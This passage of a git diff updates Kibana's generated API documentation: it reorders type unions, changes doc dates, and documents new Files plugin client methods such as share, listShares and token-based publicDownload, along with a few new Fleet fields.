"src/plugins/expressions/common/execution/container.ts", "deprecated": false @@ -34711,7 +34711,7 @@ "label": "MathArguments", "description": [], "signature": [ - "{ expression: string; onError?: \"false\" | \"null\" | \"zero\" | \"throw\" | undefined; }" + "{ expression: string; onError?: \"null\" | \"zero\" | \"false\" | \"throw\" | undefined; }" ], "path": "src/plugins/expressions/common/expression_functions/specs/math.ts", "deprecated": false, 
@@ -34801,7 +34801,7 @@ "\nAllowed column names in a PointSeries" ], "signature": [ - "\"color\" | \"size\" | \"x\" | \"y\" | \"text\"" + "\"color\" | \"size\" | \"text\" | \"y\" | \"x\"" ], "path": "src/plugins/expressions/common/expression_types/specs/pointseries.ts", "deprecated": false, @@ -35093,7 +35093,7 @@ "\nTypes used in Expressions that don't map to a primitive cleanly:\n\n`date` is typed as a number or string, and represents a date" ], "signature": [ - "\"filter\" | \"date\"" + "\"date\" | \"filter\"" ], "path": "src/plugins/expressions/common/types/common.ts", "deprecated": false, @@ -38717,7 +38717,7 @@ "label": "options", "description": [], "signature": [ - "(\"false\" | \"null\" | \"zero\" | \"throw\")[]" + "(\"null\" | \"zero\" | \"false\" | \"throw\")[]" ], "path": "src/plugins/expressions/common/expression_functions/specs/math.ts", "deprecated": false @@ -40317,7 +40317,7 @@ "label": "options", "description": [], "signature": [ - "(\"sum\" | \"min\" | \"max\" | \"average\")[]" + "(\"min\" | \"max\" | \"sum\" | \"average\")[]" ], "path": "src/plugins/expressions/common/expression_functions/specs/overall_metric.ts", "deprecated": false diff --git a/api_docs/expressions.mdx b/api_docs/expressions.mdx index a27a07152c99a..d5a70f521ffe7 100644 --- a/api_docs/expressions.mdx +++ b/api_docs/expressions.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/expressions title: "expressions" image: https://source.unsplash.com/400x175/?github description: API docs for the expressions plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'expressions'] --- import expressionsObj from './expressions.devdocs.json'; diff --git a/api_docs/features.mdx b/api_docs/features.mdx index 5b54a29b9791f..b85f190a0105b 100644 --- a/api_docs/features.mdx +++ b/api_docs/features.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/features title: "features" image: https://source.unsplash.com/400x175/?github description: API docs for the features plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'features'] --- import featuresObj from './features.devdocs.json'; diff --git a/api_docs/field_formats.mdx b/api_docs/field_formats.mdx index 5479ba7fba12f..1072dc5d534ca 100644 --- a/api_docs/field_formats.mdx +++ b/api_docs/field_formats.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/fieldFormats title: "fieldFormats" image: https://source.unsplash.com/400x175/?github description: API docs for the fieldFormats plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'fieldFormats'] --- import fieldFormatsObj from './field_formats.devdocs.json'; diff --git a/api_docs/file_upload.mdx b/api_docs/file_upload.mdx index 543e7b2c42356..8a2850648317a 100644 --- a/api_docs/file_upload.mdx +++ b/api_docs/file_upload.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/fileUpload title: "fileUpload" image: https://source.unsplash.com/400x175/?github description: API docs for the fileUpload plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'fileUpload'] --- import fileUploadObj from './file_upload.devdocs.json'; diff --git a/api_docs/files.devdocs.json b/api_docs/files.devdocs.json index 3c494b08bc77f..d7bb9ef6bf578 100644 --- a/api_docs/files.devdocs.json +++ b/api_docs/files.devdocs.json 
@@ -180,6 +180,55 @@ } ] }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.find", + "type": "Function", + "tags": [], + "label": "find", + "description": [ + "\nFind a set of files given some filters.\n" + ], + "signature": [ + "(args: { kind?: string[] | undefined; name?: string[] | undefined; meta?: {} | undefined; extension?: string[] | undefined; status?: string[] | undefined; } & ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.Pagination", + "text": "Pagination" + }, + ") => Promise<{ files: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileJSON", + "text": "FileJSON" + }, + "[]; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.find.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- File filters" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, { "parentPluginId": "files", "id": "def-public.FilesClient.update", 
@@ -286,6 +335,246 @@ "deprecated": false } ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.share", + "type": "Function", + "tags": [ + "note" + ], + "label": "share", + "description": [ + "\nShare a file by creating a new file share instance.\n" + ], + "signature": [ + "(args: { validUntil?: number | undefined; name?: string | undefined; } & { fileId: string; }) => Promise<", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileShareJSONWithToken", + "text": "FileShareJSONWithToken" + }, + ">" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.share.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- File share arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.unshare", + "type": "Function", + "tags": [], + "label": "unshare", + "description": [ + "\nDelete a file share instance.\n" + ], + "signature": [ + "(args: { id: string; }) => Promise<{ ok: true; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.unshare.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- File unshare arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getShare", + "type": "Function", + "tags": [], + "label": "getShare", + "description": [ + "\nGet 
a file share instance.\n" + ], + "signature": [ + "(args: { id: string; }) => Promise<{ share: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileShareJSON", + "text": "FileShareJSON" + }, + "; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getShare.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get file share arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.listShares", + "type": "Function", + "tags": [], + "label": "listShares", + "description": [ + "\nList all file shares. Optionally scoping to a specific\nfile.\n" + ], + "signature": [ + "(args: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.Pagination", + "text": "Pagination" + }, + " & { forFileId?: string | undefined; }) => Promise<{ shares: ", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FileShareJSON", + "text": "FileShareJSON" + }, + "[]; }>" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.listShares.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get file share arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getMetrics", + "type": "Function", 
+ "tags": [], + "label": "getMetrics", + "description": [ + "\nGet metrics of file system, like storage usage.\n" + ], + "signature": [ + "(args: unknown) => Promise<", + { + "pluginId": "files", + "scope": "common", + "docId": "kibFilesPluginApi", + "section": "def-common.FilesMetrics", + "text": "FilesMetrics" + }, + ">" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.getMetrics.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get metrics arguments" + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] + }, + { + "parentPluginId": "files", + "id": "def-public.FilesClient.publicDownload", + "type": "Function", + "tags": [], + "label": "publicDownload", + "description": [ + "\nDownload a file, bypassing regular security by way of a\nsecret share token.\n" + ], + "signature": [ + "(args: { fileName?: string | undefined; } & { token: string; }) => Promise" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false, + "returnComment": [], + "children": [ + { + "parentPluginId": "files", + "id": "def-public.FilesClient.publicDownload.$1", + "type": "CompoundType", + "tags": [], + "label": "args", + "description": [ + "- Get public download arguments." + ], + "signature": [ + "E[\"inputs\"][\"body\"] & E[\"inputs\"][\"params\"] & E[\"inputs\"][\"query\"]" + ], + "path": "x-pack/plugins/files/public/types.ts", + "deprecated": false + } + ] } ], "initialIsOpen": false 
@@ -460,7 +749,61 @@ "\nAn elasticsearch client that will be used to interact with the cluster" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -528,7 +867,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -554,33 +893,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -606,33 +919,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1592,6 +1879,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/files.mdx b/api_docs/files.mdx index be8f115621294..f9e1ebaf95e22 100644 --- a/api_docs/files.mdx +++ b/api_docs/files.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/files title: "files" image: https://source.unsplash.com/400x175/?github description: API docs for the files plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'files'] --- import filesObj from './files.devdocs.json'; @@ -21,7 +21,7 @@ Contact [@elastic/kibana-app-services](https://github.com/orgs/elastic/teams/tea | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 222 | 0 | 3 | 2 | +| 236 | 0 | 3 | 2 | ## Client diff --git a/api_docs/fleet.devdocs.json b/api_docs/fleet.devdocs.json index 31a71fc3ae753..08581064a4d00 100644 --- a/api_docs/fleet.devdocs.json +++ b/api_docs/fleet.devdocs.json 
@@ -8942,6 +8942,16 @@ "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", "deprecated": false }, + { + "parentPluginId": "fleet", + "id": "def-common.FullAgentPolicyInput.package_policy_id", + "type": "string", + "tags": [], + "label": "package_policy_id", + "description": [], + "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", + "deprecated": false + }, { "parentPluginId": "fleet", "id": "def-common.FullAgentPolicyInput.meta", @@ -10256,6 +10266,19 @@ ], "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", "deprecated": false + }, + { + "parentPluginId": "fleet", + "id": "def-common.NewAgentPolicy.schema_version", + "type": "string", + "tags": [], + "label": "schema_version", + "description": [], + "signature": [ + "string | undefined" + ], + "path": "x-pack/plugins/fleet/common/types/models/agent_policy.ts", + "deprecated": false } ], "initialIsOpen": false @@ -13910,7 +13933,7 @@ "label": "RegistrySearchResult", "description": [], "signature": [ - "{ type?: \"integration\" | undefined; name: string; path: string; version: string; title: string; download: string; description: string; icons?: (", + "{ type?: \"integration\" | undefined; path: string; download: string; title: string; description: string; icons?: (", { "pluginId": "fleet", "scope": "common", @@ -13934,7 +13957,7 @@ "section": "def-common.PackageSpecCategory", "text": "PackageSpecCategory" }, - " | undefined)[] | undefined; internal?: boolean | undefined; release?: \"experimental\" | \"beta\" | \"ga\" | undefined; policy_templates?: ", + " | undefined)[] | undefined; name: string; version: string; internal?: boolean | undefined; release?: \"experimental\" | \"beta\" | \"ga\" | undefined; policy_templates?: ", { "pluginId": "fleet", "scope": "common", diff --git a/api_docs/fleet.mdx b/api_docs/fleet.mdx index cec2044d1369d..883c4fd9502fe 100644 --- a/api_docs/fleet.mdx +++ b/api_docs/fleet.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/fleet title: "fleet" image: https://source.unsplash.com/400x175/?github description: API docs for the fleet plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'fleet'] --- import fleetObj from './fleet.devdocs.json'; @@ -21,7 +21,7 @@ Contact [Fleet](https://github.com/orgs/elastic/teams/fleet) for questions regar | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 955 | 3 | 860 | 9 | +| 957 | 3 | 862 | 9 | ## Client diff --git a/api_docs/global_search.mdx b/api_docs/global_search.mdx index 56126fc7bbda7..8c980b9b1487a 100644 --- a/api_docs/global_search.mdx +++ b/api_docs/global_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/globalSearch title: "globalSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the globalSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'globalSearch'] --- import globalSearchObj from './global_search.devdocs.json'; diff --git a/api_docs/home.devdocs.json b/api_docs/home.devdocs.json index 14a039d123e3d..907464f15b49b 100644 --- a/api_docs/home.devdocs.json +++ b/api_docs/home.devdocs.json @@ -375,7 +375,7 @@ "{@link FeatureCatalogueCategory} to display this feature in." ], "signature": [ - "\"other\" | \"data\" | \"admin\"" + "\"data\" | \"other\" | \"admin\"" ], "path": "src/plugins/home/public/services/feature_catalogue/feature_catalogue_registry.ts", "deprecated": false @@ -708,7 +708,7 @@ "label": "FeatureCatalogueCategory", "description": [], "signature": [ - "\"other\" | \"data\" | \"admin\"" + "\"data\" | \"other\" | \"admin\"" ], "path": "src/plugins/home/public/services/feature_catalogue/feature_catalogue_registry.ts", "deprecated": false, 
@@ -1598,7 +1598,7 @@ "label": "InstructionSetSchema", "description": [], "signature": [ - "{ readonly title?: string | undefined; readonly callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; readonly statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; readonly instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }" + "{ readonly title?: string | undefined; readonly callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; readonly statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; readonly instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorial_schema.ts", "deprecated": false, 
@@ -1612,7 +1612,7 @@ "label": "InstructionsSchema", "description": [], "signature": [ - "{ readonly params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; readonly instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }" + "{ readonly params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; readonly instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorial_schema.ts", "deprecated": false, 
@@ -1628,7 +1628,7 @@ "signature": [ "{ getSampleDatasets: () => ", "Writable", - "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", + "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", "SavedObject", "[]) => void; addAppLinksToSampleDataset: (id: string, appLinks: ", { @@ -1662,7 +1662,7 @@ "signature": [ "() => ", "Writable", - "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>" + "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>" ], "path": "src/plugins/home/server/services/sample_data/lib/sample_dataset_registry_types.ts", "deprecated": false, 
@@ -1716,7 +1716,7 @@ "section": "def-server.TutorialContext", "text": "TutorialContext" }, - ") => Readonly<{ isBeta?: boolean | undefined; savedObjects?: any[] | undefined; euiIconType?: string | undefined; previewImagePath?: string | undefined; moduleName?: string | undefined; completionTimeMinutes?: number | undefined; elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; 
commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; savedObjectsInstallMsg?: string | undefined; customStatusCheckName?: string | undefined; integrationBrowserCategories?: string[] | undefined; eprPackageOverlap?: string | undefined; } & { id: string; name: string; category: \"other\" | \"security\" | \"metrics\" | \"logging\"; shortDescription: string; longDescription: string; onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }>" + ") => Readonly<{ isBeta?: boolean | undefined; savedObjects?: any[] | undefined; euiIconType?: string | undefined; previewImagePath?: string | undefined; moduleName?: string | undefined; completionTimeMinutes?: number | undefined; elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; 
} & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | 
undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; savedObjectsInstallMsg?: string | undefined; customStatusCheckName?: string | undefined; integrationBrowserCategories?: string[] | undefined; eprPackageOverlap?: string | undefined; } & { id: string; name: string; category: \"other\" | \"security\" | \"metrics\" | \"logging\"; shortDescription: string; longDescription: string; onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }>" ], "path": 